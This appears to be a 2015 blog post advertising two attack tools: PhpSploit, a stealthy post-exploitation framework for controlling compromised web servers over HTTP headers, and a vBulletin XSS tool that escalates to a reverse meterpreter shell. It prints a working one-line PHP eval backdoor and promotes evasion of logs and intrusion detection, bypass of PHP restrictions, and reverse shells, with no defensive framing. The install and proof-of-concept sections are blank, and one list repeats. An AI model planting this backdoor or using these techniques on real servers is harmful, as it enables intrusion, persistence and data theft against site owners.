Thursday 19 November 2015

PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

Features

  • Efficient: More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature, with persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms:

  • GNU/Linux
  • Mac OS X
  • Windows (experimental)  

How to install : 




 

XSSER TOOL

This tool use   Cross-Site Scripting (XSS) to inject PHP code into the vBulletin Plugin feature when an administrator triggers a malicious JavaScript payload. Subsequently, a reverse meterpreter shell is granted to the attacker when the injected PHP code is activated. 

Requirements

  • Python (2.7.*, version 2.7.3 was used for development and demo)
  • Gnome
  • Bash
  • Msfconsole (accessible via environment variables)
  • Netcat (nc) 

Payload Compatibility

  • Firefox (Confirmed in a previous version)
  • Chrome (Confirmed for the latest version - 14 Nov 2015) 



     Payload Compatibility

  • Firefox (Confirmed in a previous version)
  • Chrome (Confirmed for the latest version - 14 Nov 2015)  

proof of concept  :